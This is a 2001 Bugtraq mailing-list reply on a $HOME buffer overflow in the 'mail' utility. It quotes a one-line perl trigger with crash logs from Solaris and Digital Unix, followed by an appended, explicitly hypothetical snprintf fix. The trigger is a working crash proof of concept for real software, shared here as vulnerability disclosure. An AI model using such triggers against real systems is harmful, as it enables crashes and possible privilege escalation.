[20874] in bugtraq

Re: $HOME buffer overflow in SunOS 5.8 x86

daemon@ATHENA.MIT.EDU (Gunnar Wolf)
Tue Jun 5 20:37:23 2001

Date: Tue, 5 Jun 2001 13:54:11 -0500 (CDT)
From: Gunnar Wolf <gwolf@campus.iztacala.unam.mx>
To: "Juergen P. Meier" <jpm@class.de>
Cc: Georgi Guninski <guninski@guninski.com>,
        Bugtraq <BUGTRAQ@securityfocus.com>
In-Reply-To: <20010605153305.A24252@fm.rz.fh-muenchen.de>
Message-ID: <Pine.BSO.4.31.0106051346100.1152-100000@campus.iztacala.unam.mx>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

> On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
> > $HOME buffer overflow in SunOS 5.8 x86
> > Systems affected:
> > SunOS 5.8 x86 have not tested on other OSes
> > Risk: Medium
> > Date: 4 June 2001
> >
> > Details:
> > HOME=`perl -e 'print "A"x1100'` ; export HOME
> > mail a
> > CTL-C
> > eip gets smashed with 0x41414141.
>
>
> 0:jpmeier@sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME
> 0:jpmeier@sol:/home/jpmeier> mail a
> ^Cmail: Mail saved in dead.letter
> 1:jpmeier@sol:/home/jpmeier> uname -a
> SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10
>
>
> also tried larger buffers.
>
>
> Solaris/sparc appears not vulnerable. Maybe it's an x86 bug only

Solaris 7/Sparc is vulnerable:

[gwolf@sun gwolf]$ uname -a
SunOS sun.mydomain.org 5.7 Generic_106541-16 sun4u sparc SUNW,Ultra-5_10
[gwolf@sun gwolf]$ HOME=`perl -e 'print "A"x1100'` ; export HOME
[gwolf@sun gwolf]$ mail a
^Cmail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
(...)

Digital Unix V4.0C is vulnerable:

digital> uname -a
OSF1 digital V4.0 564.32 alpha
digital> setenv HOME `perl -e 'print "a"x1100'`
Received disconnect: Command terminated on signal 6.

[and I am logged out of the machine]

I tested it also on OpenBSD 2.8/i386 and /sparc, RedHat Linux 6.1/alpha
and Debian GNU/Linux 2.2r3/i386, and they are not vulnerable.

------------------------------------------------------------
Gunnar Wolf - gwolf@campus.iztacala.unam.mx - (+52)5623-1119
Desarrollo y Admon. de Sistemas en Red - FES Iztacala - UNAM
Departamento de Seguridad en Computo   -   DGSCA    -   UNAM
------------------------------------------------------------
Quidquid latine dictum sit, altum viditur.
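
Added example, not part of the original message and not taken from any vendor's mail source: the thread does not identify the faulty code, so this assumes the common pattern of building the dead.letter path under $HOME in a fixed-size buffer, and shows a bounded version that refuses an overlong value. The names dead_letter_path and PATH_BUF are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF    1024           /* assumed fixed buffer size (illustrative) */
#define DEAD_LETTER "dead.letter"

/*
 * Unsafe pattern this replaces (hypothetical, shown only as a comment):
 *     char path[PATH_BUF];
 *     sprintf(path, "%s/%s", getenv("HOME"), DEAD_LETTER);
 * An 1100-byte $HOME, as in the report, writes past the end of path.
 */

/*
 * Build "<home>/dead.letter" in out without ever writing past outlen bytes.
 * Returns 0 on success, -1 if home is unset or empty, or if the full path
 * does not fit. On failure out is left as an empty string so that a caller
 * cannot use a truncated path by accident.
 */
int dead_letter_path(char *out, size_t outlen, const char *home)
{
    int n;

    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (home == NULL || home[0] == '\0')
        return -1;

    n = snprintf(out, outlen, "%s/%s", home, DEAD_LETTER);
    if (n < 0 || (size_t)n >= outlen) {   /* would truncate: refuse */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    char path[PATH_BUF];

    /* The environment is untrusted input; check the result before use. */
    if (dead_letter_path(path, sizeof path, getenv("HOME")) != 0) {
        fprintf(stderr, "HOME unset or too long; not saving dead.letter\n");
        return 1;
    }
    printf("would save to %s\n", path);
    return 0;
}
```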

